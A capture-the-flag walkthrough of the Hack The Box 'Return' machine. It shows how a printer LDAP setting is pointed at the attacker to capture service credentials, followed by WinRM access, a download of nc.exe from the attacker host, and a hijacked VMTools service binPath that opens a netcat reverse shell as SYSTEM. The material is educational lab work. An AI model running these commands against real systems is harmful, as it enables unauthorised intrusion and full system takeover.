[HTB] Return Writeup
HTB Return write-up
TL;DR
Changing the printer server address to the attacker IP caused the target to authenticate back and expose the svc-printer credentials. Using svc-printer over WinRM, the Server Operators membership allowed abusing writable service configuration. The VMTools service binPath was replaced with nc.exe, and restarting the service spawned a SYSTEM shell.
1. Recon
Nmap scan result showed that the target was a Windows host exposing web, SMB, LDAP, Kerberos, and WinRM-related services. The presence of AD related ports indicated that the machine was likely part of an Active Directory environment.
port scan result 
2. Initial Access - Printer Configuration Credential Capture
The web application exposed a printer settings page.
1
http://10.129.95.241/settings.php
The settings page contained LDAP connection information used by the printer service. The LDAP server address was modified to the attacker IP.
After saving the configuration, the target attempted to connect back to the attacker machine on port 389. During this connection, the configured credentials were sent to the attacker listener.
The following credential was recovered.
1
svc-printer:1edFg43012!!
The recovered credential was then used to authenticate to the target through WinRM.
1
└─$ evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
3. Privilege Escalation - Server Operators to SYSTEM via Service Configuration Abuse
1
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
The svc-printer account was a member of the Server Operators group.
This was important because Server Operators can perform administrative server-management tasks. In this case, the account had enough privileges to modify service configurations.
The Evil-WinRM services command was used to identify services that the current user could modify.
1
*Evil-WinRM* PS C:\Users\svc-printer\Documents> services
The output showed that the VMTools service had Privileges=True
1
2
3
Path Privileges Service
---- ---------- -------
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
This indicated that the current user could modify the VMTools service configuration.
Since Windows services often run with high privileges, VMTools was selected as the privilege escalation target. The service execution path could be replaced with a reverse shell command.
First, nc.exe was downloaded to the target.
1
*Evil-WinRM* PS C:\Users\svc-printer\Documents> Invoke-WebRequest -Uri http://10.10.14.37/nc.exe -Outfile C:\Users\svc-printer\Documents\nc.exe
Then the VMTools service binPath was changed to execute nc.exe.
1
2
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath= "C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.37 80"
[SC] ChangeServiceConfig SUCCESS
This changed the command executed when the VMTools service starts.
On the attacker machine, a Netcat listener was started.
1
nc -lvnp 80
The VMTools service was then stopped and started.
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VMTools
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VMTools
After the service was started, the target connected back to the listener.
1
2
3
4
5
6
7
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.37] from (UNKNOWN) [10.129.95.241] 55299
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami && ipconfig && type \Users\Administrator\Desktop\root.txt
